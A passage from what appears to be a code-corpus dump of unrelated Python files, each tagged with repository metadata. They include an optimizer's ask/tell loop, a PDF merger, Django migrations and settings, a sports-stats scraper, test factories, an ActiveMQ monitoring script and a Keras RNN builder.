        -------
        boolean
        """
        # x convergence: converged if any of the last few points is within
        # eps (euclidean) of the latest point.
        n_hist = 2
        escape_convergence_history = any(
            (np.linalg.norm(x_train[iteration - (n_hist + 1):] - x_train[iteration - 1], axis=1)) < self.eps)
        # check whether point is inside bounds
        escape_valid = not (grAdapt.utils.sampling.inside_bounds(self.bounds, x_train[iteration - 1]))
        return escape_convergence_history or escape_valid
    @staticmethod
    def escape_y_criteria(y_train, iteration, pct):
        """Return True when the last two objective values are within a
        relative range of ``pct``, i.e. the objective has stagnated.

        Parameters
        ----------
        y_train : array-like (n, d)
        iteration : integer
        pct : numeric
            pct should be less than 1.

        Returns
        -------
        boolean
        """
        try:
            return grAdapt.utils.misc.is_inside_relative_range(y_train[iteration - 1], y_train[iteration - 2], pct)
        except Exception:  # narrowed from bare except; too few points etc.
            return False
    def dummy(self):
        """Placeholder callable passed to the surrogate gradient parameters."""
        return 0
    def ask(self):
        """Return the next point to evaluate; call ``tell`` afterwards."""
        if len(self.X) > len(self.y):  # still consuming initial points
            self.iteration += 1
            # if user asks consecutively without telling
            if self.iteration == len(self.y) + 2:
                self.iteration -= 1
                warnings.warn("Tell the optimizer/model after you ask.", RuntimeWarning)
            return self.X[self.iteration - 1]
        else:
            # gradient parameters specific for the surrogate model
            surrogate_grad_params = [np.array(self.X[:self.iteration]), np.array(self.y[:self.iteration]),
                                     self.dummy, self.bounds]
            # apply optimizer
            return_x = self.optimizer.run(self.X[self.iteration - 1],
                                          grAdapt.utils.misc.epochs(self.iteration),
                                          surrogate_grad_params)
            # escape indicator variables
            escape_x_criteria_boolean = self.escape_x_criteria(np.array(self.X), self.iteration)
            escape_y_criteria_boolean = self.escape_y_criteria(self.y, self.iteration, self.f_min_eps)
            escape_boolean = escape_x_criteria_boolean or escape_y_criteria_boolean
            # sample new point if must escape or bounds not valid
            if escape_boolean:
                return_x = self.escape.get_point(self.X[:self.iteration], self.y[:self.iteration],
                                                 self.iteration, self.bounds)
            self.iteration += 1
            return return_x
    def tell(self, next_x, f_val):
        """Report the objective value *f_val* for the point *next_x* and
        refit the surrogate model."""
        if len(self.X) > len(self.y):
            # no need to append x
            self.y.append(f_val)
        elif len(self.X) == len(self.y):
            # append
            self.X.append(next_x)
            self.y.append(f_val)
        else:
            raise RuntimeError('More function values available than x values/parameter sets.')
        # Fit surrogate on (X, y); previously this fitted (X, X), which
        # trained the model against the inputs instead of the objective.
        self.surrogate.fit(np.array(self.X[:self.iteration]), np.array(self.y[:self.iteration]))
| 2.171875 | 2 |
python/PDF/pdfcat.py | eucalypto/potato | 0 | 12761523 | <filename>python/PDF/pdfcat.py
#! /usr/bin/env python
from PyPDF2 import PdfFileReader, PdfFileWriter
import sys
def merge_pdfs(paths, output):
    """Concatenate the PDF files in ``paths`` into a single file ``output``.

    Pages are appended in the order the input paths are given.
    """
    writer = PdfFileWriter()
    for source in paths:
        reader = PdfFileReader(source)
        for page_index in range(reader.getNumPages()):
            writer.addPage(reader.getPage(page_index))
    with open(output, "wb") as destination:
        writer.write(destination)
if __name__ == '__main__':
    # Command line: pdfcat.py input1.pdf input2.pdf ... output.pdf
    # Every argument except the last is an input; the last is the output.
    input_paths = sys.argv[1:-1]
    output_path = sys.argv[-1]
    merge_pdfs(input_paths, output_path)
| 3.65625 | 4 |
host_manager_19/rbac/migrations/0006_menu_weight.py | gengna92/PythonProjects | 0 | 12761524 | <reponame>gengna92/PythonProjects
# -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2019-06-16 06:56
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add an integer ``weight`` field (default 1) to the ``menu`` model.

    Auto-generated by Django (makemigrations); do not edit by hand.
    """
    dependencies = [
        ('rbac', '0005_auto_20190616_1137'),
    ]
    operations = [
        migrations.AddField(
            model_name='menu',
            name='weight',
            field=models.IntegerField(default=1),
        ),
    ]
| 1.445313 | 1 |
tests/core/test_setproctitle.py | inan0812/chia-blockchain | 1 | 12761525 | import unittest
from inan.util.setproctitle import setproctitle
class TestSetProcTitle(unittest.TestCase):
    """Smoke test: setting the process title must not raise."""

    def test_does_not_crash(self):
        title = "inan test title"
        setproctitle(title)
| 2 | 2 |
astronomy_datamodels/tags/obs_context.py | spacetelescope/astronomy_datamodels | 1 | 12761526 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
from asdf import yamlutil
from asdf.versioning import AsdfSpec
from ..types import AstronomyDataModelType
from ..obs_context import ObsContext
class ObsContextType(AstronomyDataModelType):
    """ASDF (de)serializer for ``ObsContext`` objects.

    Every optional attribute is copied to/from the tagged tree under a key of
    the same name; ``None`` attributes / absent keys are skipped.
    """
    name = 'datamodel/obs_context'
    version = '1.0.0'
    supported_versions = ['1.0.0']
    types = ['astronomy_datamodels.obs_context.ObsContext']
    requires = ["astropy"]

    # Attributes handled uniformly by to_tree/from_tree, in tree-key order.
    _FIELDS = ('telescope', 'instrument', 'proposal', 'observers',
               'target', 'associated_data', 'meta')

    @classmethod
    def to_tree(cls, node, ctx):  # to ASDF representation
        """Convert an ObsContext into a tagged-tree dict, omitting None fields."""
        tree = {}
        for field in cls._FIELDS:
            value = getattr(node, field)
            if value is not None:
                tree[field] = yamlutil.custom_tree_to_tagged_tree(value, ctx)
        return tree

    @classmethod
    def from_tree(cls, node, ctx):  # from ASDF to object representation
        """Build an ObsContext from a tagged-tree dict; absent keys keep defaults."""
        obscontext = ObsContext()
        for field in cls._FIELDS:
            if field in node:
                setattr(obscontext, field,
                        yamlutil.tagged_tree_to_custom_tree(node[field], ctx))
        return obscontext

    @classmethod
    def assert_equal(cls, old, new):
        """Equality assertion hook for round-trip tests (not implemented)."""
        pass
| 2.078125 | 2 |
basketball_analysis/Requests/Requests.py | ArjunMehta01/basketball_analysis | 0 | 12761527 | import pandas as pd
from bs4 import BeautifulSoup
from urllib.request import urlopen
class nba_request():
    """Scraper for Basketball-Reference NBA season statistics tables.

    Each accessor method takes the base ``url`` (normally ``self.url``) plus
    a season year and returns the matching stats table as a pandas DataFrame.
    """

    def __init__(self):
        # Base URL only -- the season year and the page extension are
        # appended in parse_url(), so this is NOT a full URL.
        self.url = 'https://www.basketball-reference.com/leagues/NBA_'

    def totals(self, url, year):
        """Return season total statistics as a DataFrame."""
        return self.parse_url(url, '_totals.html', year)

    def per_game(self, url, year):
        """Return per-game statistics as a DataFrame."""
        return self.parse_url(url, '_per_game.html', year)

    def per_36(self, url, year):
        """Return per-36-minutes statistics as a DataFrame."""
        return self.parse_url(url, '_per_minute.html', year)

    def per_100(self, url, year):
        """Return per-100-possessions statistics as a DataFrame."""
        return self.parse_url(url, '_per_poss.html', year)

    def advanced(self, url, year):
        """Return advanced statistics as a DataFrame."""
        return self.parse_url(url, '_advanced.html', year)

    def play(self, url, year):
        """Return play-by-play statistics as a DataFrame."""
        return self.parse_url(url, '_play-by-play.html', year)

    def shooting(self, url, year):
        """Return shooting statistics as a DataFrame."""
        return self.parse_url(url, '_shooting.html', year)

    def adjusted_shooting(self, url, year):
        """Return adjusted shooting statistics as a DataFrame."""
        return self.parse_url(url, '_adj_shooting.html', year)

    def parse_url(self, url, extension, year):
        """Download one stats page and parse its table into a DataFrame.

        Args:
            url (str): base URL, e.g. ``self.url``.
            extension (str): page suffix such as ``'_totals.html'``.
            year (int): season year, inserted between ``url`` and ``extension``.

        Returns:
            pandas.DataFrame: one row per player; columns come from the table
            header (the leading rank column is dropped).
        """
        page_url = url + "{}{}".format(year, extension)
        html = urlopen(page_url)
        soup = BeautifulSoup(html, features='lxml')
        # Column headers live in the first table row; drop the leading 'Rk'
        # column, which is just Basketball-Reference's ranking order.
        # (The original code issued a second, discarded findAll() call and a
        # bare no-op `headers` expression here -- both removed.)
        headers = [th.getText() for th in soup.findAll('tr', limit=2)[0].findAll('th')]
        headers = headers[1:]
        # Skip the header row, then collect the cell text of every data row.
        rows = soup.findAll('tr')[1:]
        player_stats = [[td.getText() for td in row.findAll('td')]
                        for row in rows]
        return pd.DataFrame(player_stats, columns=headers)
| 3.59375 | 4 |
rollgen/tests/factories.py | SmartElect/SmartElect | 23 | 12761528 | <reponame>SmartElect/SmartElect
# Python imports
import os
import random
# 3rd party imports
import factory
# project imports
from ..constants import CITIZEN_SORT_FIELDS
from civil_registry.models import Citizen
from civil_registry.tests.factories import CitizenFactory
from libya_elections.constants import MALE, FEMALE
from register.tests.factories import RegistrationFactory, SMSFactory
# Load the fake-name word pools once at import time. The .txt files ship next
# to this module and contain one UTF-8 word per line.
filename = os.path.join(os.path.dirname(__file__), '_random_arabic_person_names.txt')
with open(filename, 'rb') as f:
    words = f.read().decode('utf-8')
# Remove blank lines and extraneous whitespace.
person_names = [word.strip() for word in words.split('\n') if word.strip()]
filename = os.path.join(os.path.dirname(__file__), '_random_arabic_place_names.txt')
with open(filename, 'rb') as f:
    words = f.read().decode('utf-8')
# Remove blank lines and extraneous whitespace.
place_names = [word.strip() for word in words.split('\n') if word.strip()]
def generate_arabic_place_name(min_length=0):
    """Return a randomly generated, potentially multi-word fake Arabic place name.

    Starts with 3 random words and keeps adding one more word until the name
    is at least ``min_length`` characters long.

    Args:
        min_length (int): minimum length of the returned name in characters.

    Returns:
        str: space-joined place name built from ``place_names``.
    """
    # PEP 8 (E731): use a def instead of assigning a lambda to a name.
    def make_name(n_words):
        # random.sample draws without replacement, so words are distinct.
        return ' '.join(random.sample(place_names, n_words))

    n_words = 3
    name = make_name(n_words)
    while len(name) < min_length:
        n_words += 1
        name = make_name(n_words)
    return name
def create_voters(n_voters, gender=None, center=None):
    """Create voters in bulk, with options not available via the factory.

    Args:
        n_voters (int): number of voters to create.
        gender: fixed gender for all voters; when None, genders alternate
            MALE/FEMALE across the created voters.
        center: registration center to register each voter to (passed through
            to the factory's post-generation hook).

    Returns:
        list[Citizen]: the created voters, ordered by CITIZEN_SORT_FIELDS.
    """
    toggle_gender = not bool(gender)
    if not gender:
        gender = MALE
    # I create a dummy SMS here for optimization. If the VoterFactory creates a registration for
    # each user and I don't pass an SMS instance, it will create an SMS for each registration which
    # triggers the creation of a Citizen and a Backend. Passing a dummy SMS reduces this overhead
    # from O(3 * n_voters) to O(1). It's logically incorrect to associate the same SMS with multiple
    # registrations, but rollgen doesn't pay attention to SMSes.
    sms = SMSFactory()
    voter_ids = []
    for i in range(n_voters):
        if toggle_gender:
            gender = FEMALE if (gender == MALE) else MALE
        voter = VoterFactory(gender=gender, post__center=center, post__sms=sms)
        voter_ids.append(voter.pk)
    # It's a bit painful performance-wise, but in order to sort these the same way as
    # get_voter_roll(), I have to let the database do the sorting.
    return list(Citizen.objects.filter(pk__in=voter_ids).order_by(*CITIZEN_SORT_FIELDS))
class VoterFactory(CitizenFactory):
    """Create a voter with a random Arabic name"""
    # factory_boy post-generation hook: runs after the Citizen instance is
    # built. Note the first parameter is the instance itself (factory_boy
    # convention), not a conventional ``self``.
    @factory.post_generation
    def post(instance, create, extracted, **kwargs):
        # Assign random names drawn from the module-level person_names pool.
        instance.first_name = random.choice(person_names)
        instance.father_name = random.choice(person_names)
        instance.grandfather_name = random.choice(person_names)
        instance.family_name = random.choice(person_names)
        instance.mother_name = random.choice(person_names)
        if kwargs['center']:
            # Register this voter to this center
            reg_kwargs = dict(citizen=instance, registration_center=kwargs['center'],
                              archive_time=None)
            # Reuse a caller-provided SMS to avoid creating one per
            # registration (see create_voters above for the rationale).
            if 'sms' in kwargs and kwargs['sms']:
                reg_kwargs['sms'] = kwargs['sms']
            RegistrationFactory(**reg_kwargs)
| 2.828125 | 3 |
targets_cb.py | ludios/Minerva | 1 | 12761529 | <filename>targets_cb.py
# This file is used by build_autocachebreakers.py
# Note: both outputs and breakers[n][1] are relative to this file's directory.
# Each target maps a generated JS output file to the list of cache-breaker
# (JS variable name, dependency file) pairs baked into it.
targets = [
    {"output": "js_minerva/cw/net/autocachebreakers.js",
    "breakers": [
        ("cw.net.breaker_FlashConnector_swf", "minerva/compiled_client/FlashConnector.swf"),
    ]},
]
| 1.234375 | 1 |
libs/python/stupendous_cow/__init__.py | tomault/stupendous-cow | 0 | 12761530 | """Python packages that contain the common code for the "stupendous-cow"
article indexing and search system."""
| 1.070313 | 1 |
walletlib/scripts/dumpwallet.py | satoshi-n/walletlib | 0 | 12761531 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""CLI Interface to Walletlib
This is a simple implementation to allow walletlib to be used from the cli.
It will certainly gain more features as they are added. Currently it takes a wallet.dat file and dumps either a full
seet of its contents or just the keys out.
"""
import click
from walletlib import Walletdat, ProtobufWallet
import json
def _parse_and_report(wallet, password):
    """Parse *wallet* (optionally with a passphrase) and echo summary info."""
    click.echo("Loaded file")
    if password:
        wallet.parse(passphrase=str(password))
    else:
        wallet.parse()
    click.echo(
        "Found {} keypairs and {} transactions".format(len(wallet.keypairs), len(wallet.txes))
    )
    click.echo("Default version byte: {}".format(wallet.default_wifnetwork))


def _dump(wallet, output, keys, dump_kwargs):
    """Dump keys (or everything) as JSON to stdout, or save to *output*."""
    dump_fn = wallet.dump_keys if keys else wallet.dump_all
    if not output:
        d = dump_fn(**dump_kwargs)
        click.echo(json.dumps(d, sort_keys=True, indent=4))
    else:
        dump_fn(output, **dump_kwargs)
    click.echo("Done")


@click.command()
@click.argument("filename", type=click.Path(exists=True))
@click.option("-p", "--password", help="Password if any", type=click.STRING)
@click.option(
    "-o", "--output", help="File to save to. If not set, results only will be displayed"
)
@click.option(
    "-v",
    "--versionprefix",
    type=int,
    help="Force output to use this p2pkh version byte",
)
@click.option(
    "-s", "--secretprefix", type=int, help="Force output to use this WIF version byte"
)
@click.option("--keys", is_flag=True, help="Only dump keys.")
def main(filename, password, output, versionprefix, secretprefix, keys):
    """Dump the contents (or just the keys) of a wallet file.

    ``.dat`` files honour the version-byte overrides; protobuf wallets are
    dumped with their built-in defaults (matching the original behaviour).
    """
    if filename.endswith(".dat"):
        w = Walletdat.load(filename)
        _parse_and_report(w, password)
        _dump(w, output, keys,
              {"version": versionprefix, "privkey_prefix_override": secretprefix})
    else:
        try:
            w = ProtobufWallet.load(filename)
            _parse_and_report(w, password)
            _dump(w, output, keys, {})
        except Exception:
            # Was a bare ``except:``; narrowed so KeyboardInterrupt/SystemExit
            # still propagate instead of being reported as a read error.
            click.echo("Error, cannot read wallet file")
| 2.484375 | 2 |
Inversion/inputData_generation.py | ycli0536/RES-Inv | 4 | 12761532 | <reponame>ycli0536/RES-Inv
import numpy as np
import os
from getConfig import gConfig
from data_generation import data_preprocessing
# Build the 2-D input tensor for prediction from the configured raw data and
# save it as X_test.npy in the prediction directory.
generator = data_preprocessing()
data_for_pred = generator.inputData_2d(dataPath=gConfig['datapath'],
                                       data_file=gConfig['data_file_name'],
                                       num_samples=gConfig['num_samples'],
                                       im_dim=gConfig['im_dim'],
                                       num_channels=gConfig['num_channels'],
                                       data_form='raw'
                                       )
save_path = gConfig['predictionpath']
# np.save appends the .npy extension automatically.
np.save(os.path.join(save_path, 'X_test'), data_for_pred)
print('Data for prediction saved at: ', save_path) | 2.25 | 2 |
soil/graphs/views.py | mabbettbyron/terraprobe | 2 | 12761533 | from django.http import HttpResponse
from django.template import loader
def customer_weekly(request, site_id):
    """Render the weekly customer report page.

    ``site_id`` is accepted from the URL but not yet used in the template
    context.
    """
    context = {}
    template = loader.get_template('customer_weekly.html')
    return HttpResponse(template.render(context, request))
def serve_svg(request):
    """Render the SVG-serving page."""
    context = {}
    template = loader.get_template('serve_svg.html')
    return HttpResponse(template.render(context, request))
| 2.03125 | 2 |
django_q/compat.py | Balletie/django-q | 0 | 12761534 | from __future__ import absolute_import
"""
Compatibility layer.
Intentionally replaces use of python-future
"""
# https://github.com/Koed00/django-q/issues/4
try:
range = xrange
except NameError:
range = range
| 1.414063 | 1 |
django_react/settings.py | AmbiteamProject/spleeter-web | 202 | 12761535 | <gh_stars>100-1000
import os
# Django settings for the Spleeter Web project. Most deployment-specific
# values are read from environment variables.
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# NOTE(review): insecure fallback -- ensure SECRET_KEY is set in production.
SECRET_KEY = os.getenv('SECRET_KEY', 'sekrit')
YOUTUBE_API_KEY = os.getenv('YOUTUBE_API_KEY', '')
# '1' (default) = run source separation on CPU instead of GPU.
CPU_SEPARATION = bool(int(os.getenv('CPU_SEPARATION', '1')))
# NOTE(review): when APP_HOST is unset this list contains None -- confirm
# that is intentional.
ALLOWED_HOSTS = [os.getenv('APP_HOST'), '0.0.0.0', '127.0.0.1', 'localhost']
# Pick exactly one file-storage backend; Azure is the active default.
DEFAULT_FILE_STORAGE = 'api.storage.AzureStorage'
# DEFAULT_FILE_STORAGE = 'api.storage.S3Boto3Storage'
# DEFAULT_FILE_STORAGE = 'api.storage.FileSystemStorage'
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
##################################
# Azure storage backend settings #
##################################
AZURE_ACCOUNT_KEY = os.getenv('AZURE_ACCOUNT_KEY', '')
AZURE_ACCOUNT_NAME = os.getenv('AZURE_ACCOUNT_NAME', '')
AZURE_CONTAINER = os.getenv('AZURE_CONTAINER', '')
AZURE_CUSTOM_DOMAIN = os.getenv('AZURE_CUSTOM_DOMAIN')
AZURE_OBJECT_PARAMETERS = {'content_disposition': 'attachment'}
################################
# AWS storage backend settings #
################################
AWS_ACCESS_KEY_ID = os.getenv('AWS_ACCESS_KEY_ID', '')
AWS_SECRET_ACCESS_KEY = os.getenv('AWS_SECRET_ACCESS_KEY', '')
AWS_STORAGE_BUCKET_NAME = os.getenv('AWS_STORAGE_BUCKET_NAME', '')
AWS_S3_CUSTOM_DOMAIN = os.getenv('AWS_S3_CUSTOM_DOMAIN')
# A path prefix that will be prepended to all uploads
AWS_LOCATION = 'media'
# Disable query parameter authentication (for public reads)
AWS_QUERYSTRING_AUTH = False
# Make uploaded files publicly accessible and downloadable
AWS_S3_OBJECT_PARAMETERS = {'ACL': 'public-read', 'ContentDisposition': 'attachment'}
# S3 region
AWS_S3_REGION_NAME = 'us-east-1'
CELERY_BROKER_URL = os.getenv('CELERY_BROKER_URL', 'redis://localhost:6379/0')
CELERY_RESULT_BACKEND = os.getenv('CELERY_RESULT_BACKEND', 'redis://localhost:6379/0')
# Long-running separation tasks go to slow_queue; quick downloads to
# fast_queue so they are not starved.
CELERY_TASK_ROUTES = {
    'api.tasks.create_static_mix': {
        'queue': 'slow_queue'
    },
    'api.tasks.create_dynamic_mix': {
        'queue': 'slow_queue'
    },
    'api.tasks.fetch_youtube_audio': {
        'queue': 'fast_queue'
    },
}
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': 'spleeter-web.sqlite3',
    }
}
MEDIA_ROOT = 'media'
MEDIA_URL = '/media/'
SEPARATE_DIR = 'separate'
UPLOAD_DIR = 'uploads'
# MIME types accepted for audio uploads.
VALID_MIME_TYPES = [
    'audio/aac', 'audio/aiff', 'audio/x-aiff', 'audio/ogg', 'video/ogg', 'application/ogg', 'audio/opus', 'audio/vorbis', 'audio/mpeg',
    'audio/mp3', 'audio/mpeg3', 'audio/x-mpeg-3', 'video/mpeg', 'audio/m4a', 'audio/x-m4a', 'audio/x-hx-aac-adts', 'audio/mp4', 'video/x-mpeg',
    'audio/flac', 'audio/x-flac', 'audio/wav', 'audio/x-wav', 'audio/webm', 'video/webm'
]
VALID_FILE_EXT = [
    # Lossless
    '.aif',
    '.aifc',
    '.aiff',
    '.flac',
    '.wav',
    # Lossy
    '.aac',
    '.m4a',
    '.mp3',
    '.opus',
    '.weba',
    '.webm',
    # Ogg (Lossy)
    '.ogg',
    '.oga',
    '.mogg'
]
# 100 MiB upload cap.
UPLOAD_FILE_SIZE_LIMIT = 100 * 1024 * 1024
# 30 minutes maximum length for YouTube imports.
YOUTUBE_LENGTH_LIMIT = 30 * 60
YOUTUBE_MAX_RETRIES = 3
# Application definition
INSTALLED_APPS = [
    'whitenoise.runserver_nostatic',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'api.apps.ApiConfig',
    'frontend.apps.FrontendConfig',
    'rest_framework',
    'webpack_loader'
]
WEBPACK_LOADER = {
    'DEFAULT': {
        'BUNDLE_DIR_NAME': 'dist/',
        'STATS_FILE': os.path.join(BASE_DIR, 'frontend', 'assets', 'webpack-stats.json')
    }
}
REST_FRAMEWORK = {
    'DEFAULT_RENDERER_CLASSES': (
        'rest_framework.renderers.JSONRenderer',
    )
}
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'whitenoise.middleware.WhiteNoiseMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware'
]
ROOT_URLCONF = 'django_react.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'frontend', 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'frontend.context_processors.debug',
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'django_react.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, 'frontend', 'assets'),
)
# Override production variables if DJANGO_DEVELOPMENT env variable is set
if os.getenv('DJANGO_DEVELOPMENT'):
    from .settings_dev import *
| 1.5625 | 2 |
src/jaws_scripts/client/set_effective_registration.py | JeffersonLab/kafka-alarm-scripts | 0 | 12761536 | #!/usr/bin/env python3
"""
Set effective registration.
**Note**: This is generally for testing only and should be done automatically via
`jaws-effective-processor <https://github.com/JeffersonLab/jaws-effective-processor>`_
"""
import click
from jaws_libp.clients import EffectiveRegistrationProducer
from jaws_libp.entities import EffectiveRegistration, \
AlarmInstance, SimpleProducer
# pylint: disable=duplicate-code
def __get_instance():
return AlarmInstance("base",
SimpleProducer(),
["INJ"],
"alarm1",
"command1")
# pylint: disable=missing-function-docstring,no-value-for-parameter
@click.command()
@click.option('--unset', is_flag=True, help="present to clear state, missing to set state")
@click.argument('name')
def set_effective_registration(unset, name):
producer = EffectiveRegistrationProducer('set_effective_registration.py')
key = name
if unset:
value = None
else:
alarm_class = None
alarm_instance = __get_instance()
value = EffectiveRegistration(alarm_class, alarm_instance)
producer.send(key, value)
def click_main() -> None:
set_effective_registration()
if __name__ == "__main__":
click_main()
| 2.296875 | 2 |
serieswatcher/serieswatcher/windows/about.py | lightcode/SeriesWatcher | 0 | 12761537 | <filename>serieswatcher/serieswatcher/windows/about.py
# -*- coding: utf-8 -*-
from PyQt4 import QtGui
from serieswatcher.const import TEXT_VERSION, RELEASE_DATE
class About(QtGui.QDialog):
"""Class to create the window 'about'."""
def __init__(self, parent=None):
"""Create the window 'about'."""
super(About, self).__init__(parent)
self.setWindowTitle('A propos')
ABOUT = (
u'SeriesWatcher %s - %s<br/>'
u'Créé par <NAME> publié sur '
u'<a href="http://lightcode.fr">LightCode.fr</a> sous licence GPL.'
u'<hr/>'
u'Base de donnée : '
u'<a href="http://thetvdb.com">TheTVDB.com</a><br/>'
u'Librairies Python externes : desktop, PyQt4, ConfigParser3.2, '
u'LibVLC, SQLObject.'
) % (TEXT_VERSION, RELEASE_DATE)
text = QtGui.QLabel(ABOUT)
text.setOpenExternalLinks(True)
layout = QtGui.QVBoxLayout()
layout.addWidget(text)
self.setLayout(layout)
| 2.484375 | 2 |
data/train/python/0bab5f05bf4eda7b914196e4788f5b171b189c47simpleActivemqMonitor.py | harshp8l/deep-learning-lang-detection | 84 | 12761538 | #-*-coding:utf-8-*-
'use restful api to monitor activemq broker'
__author__ = 'afred.lyj'
import httplib
import urllib
import base64
import json
import logging
from logging.handlers import TimedRotatingFileHandler
logHandler = TimedRotatingFileHandler("logfile.log",when="d", interval=1, backupCount=5)
logFormatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
logHandler.setFormatter(logFormatter)
logHandler.suffix = "%Y%m%d" # 设置后缀
logger = logging.getLogger('activemqMonitorLog')
logger.addHandler(logHandler)
logger.setLevel(logging.INFO)
username = 'admin'
password = '<PASSWORD>'
mqList='192.168.1.101:8161:example.MyQueue,opaycenter_queue_notify_2000;192.168.1.102:8161:example.MyQueue,opaycenter_queue_notify_2000'
#logging.basicConfig(filename="activemqMonitor.log", level=logging.DEBUG)
def parseMqList(mqList):
li = mqList.split(';')
l = list()
for entry in li:
d = dict()
broker = entry.split(':')
d['host'] = broker[0]
d['port'] = broker[1]
queues = broker[2].split(',')
d['queues'] = queues
l.append(d)
return l
def httpGet(host,port,url,timeout=10):
#print("httpget the host:%s,port:%d, the param:%s" %(host,port,url))
base64String = base64.encodestring('%s:%s' % (username, password))
authHeader = 'Basic %s' % base64String
headers = {'Authorization': authHeader}
try:
conn = httplib.HTTPConnection(host,port=port,timeout=timeout)
conn.request("GET",url, None, headers)
response = conn.getresponse()
#print("status:"+str(response.status)+", reason:"+str(response.reason))
if response.status == httplib.OK:
data = response.read()
return data
except Exception, e:
logger.error(e)
return "";
def checkBrokerAttribute(host, port, attribute):
uri = "/api/jolokia/read/org.apache.activemq:type=Broker,brokerName=localhost/" + attribute
response = httpGet(host, port, uri)
#print response
if response:
result = json.loads(response)
percent = result['value']
if percent >= 10:
print "alert : the usage of broker memory arrived %d" % percent
return True
else:
print "everything is ok, haha"
return False
else:
print "alert : mq broker is shutdown, please try to restart it"
return True
def checkBroker(host, port):
return checkBrokerAttribute(host, port, 'MemoryPercentUsage') or checkBrokerAttribute(host, port, 'StorePercentUsage')
def checkQueue(host, port, queueName):
uri = "/api/jolokia/read/org.apache.activemq:type=Broker,brokerName=localhost,destinationType=Queue,destinationName=%s/" % queueName
#print uri
response = httpGet(host, port, uri)
#print response
if response:
result = json.loads(response)
values = result.get('value')
#print values
queueSize = values.get('QueueSize')
if queueSize > 10:
print "current queue size is %d, need alert" % queueSize
memoryPercentUsage = values.get('MemoryPercentUsage')
if memoryPercentUsage > 10:
print 'current queue memory percent usage %d, need alert' % memoryPercentUsage
else:
print 'no response from activemq broker, need alert'
if __name__=='__main__':
logger.info("hello")
l = parseMqList(mqList)
#print l
for broker in l:
brokerDown = checkBroker(broker['host'], int(broker['port']))
#print brokerDown
if brokerDown:
continue;
#checkBroker(broker['host'], int(broker['port']), 'StorePercentUsage')
queues = broker.get('queues')
for queue in queues:
checkQueue(broker['host'], int(broker['port']), queue)
| 2.34375 | 2 |
nicu_los/src/utils/modelling.py | bt-s/NICU-length-of-stay-prediction | 2 | 12761539 | #!/usr/bin/python3
"""modelling.py
Various utility functions for modelling
"""
__author__ = "<NAME>"
import os
import numpy as np
import tensorflow as tf
from tensorflow.keras.callbacks import Callback
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Activation, BatchNormalization, \
Bidirectional, concatenate, Conv1D, Dense, Dropout, \
GlobalAveragePooling1D, GRU, Input, LSTM, Masking, \
SpatialDropout1D
from tensorflow.keras.losses import MeanAbsoluteError, \
SparseCategoricalCrossentropy
from tensorflow.keras.optimizers import Adam
from nicu_los.src.utils.evaluation import evaluate_classification_model, \
evaluate_regression_model
from nicu_los.src.utils.custom_keras_layers import ApplyMask, \
squeeze_excite_block, Slice
def construct_rnn(input_dimension, output_dimension, model_type='lstm',
n_cells=1, dropout=0.3, hid_dimension=64, model_name=""):
"""Construct an RNN model (either LSTM or GRU)
Args:
input_dimension (int): Input dimension of the model
output_dimension (int): Output dimension of the model
n_cells (int): Number of RNN cells
dropout (float): Amount of dropout to apply after each RNN cell
hid_dimension (int): Dimension of the hidden layer (i.e. # of unit in
the RNN cell)
Returns:
model (tf.keras.Model): Constructed RNN model
"""
inputs = Input(shape=(None, input_dimension))
# Skip timestep if all values of the input tensor are 0
X = Masking()(inputs)
num_hid_units = hid_dimension
for layer in range(n_cells - 1):
num_hid_units = num_hid_units // 2
if model_type == 'lstm':
cell = LSTM(units=num_hid_units, activation='tanh',
return_sequences=True, recurrent_dropout=0.0,
dropout=dropout)
elif model_type == 'gru':
cell = GRU(units=num_hid_units, activation='tanh',
return_sequences=True, recurrent_dropout=0.0,
dropout=dropout)
else:
raise ValueError("Parameter 'model_type' should be one of " +
"'lstm' or 'gru'.")
X = Bidirectional(cell)(X)
# There always has to be at least one cell
if model_type == 'lstm':
X = LSTM(activation='tanh', dropout=dropout, recurrent_dropout=0.0,
return_sequences=False, units=hid_dimension)(X)
elif model_type == 'gru':
X = GRU(activation='tanh', dropout=dropout, recurrent_dropout=0.0,
return_sequences=False, units=hid_dimension)(X)
else:
raise ValueError("Parameter 'model_type' should be one of " +
"'lstm' or 'gru'.")
if dropout:
X = Dropout(dropout)(X)
if output_dimension != 1:
# Classification
outputs = Dense(units=output_dimension, activation='softmax')(X)
else:
# Regression
outputs = Dense(units=output_dimension)(X)
model = Model(inputs=inputs, outputs=outputs, name=model_name)
return model
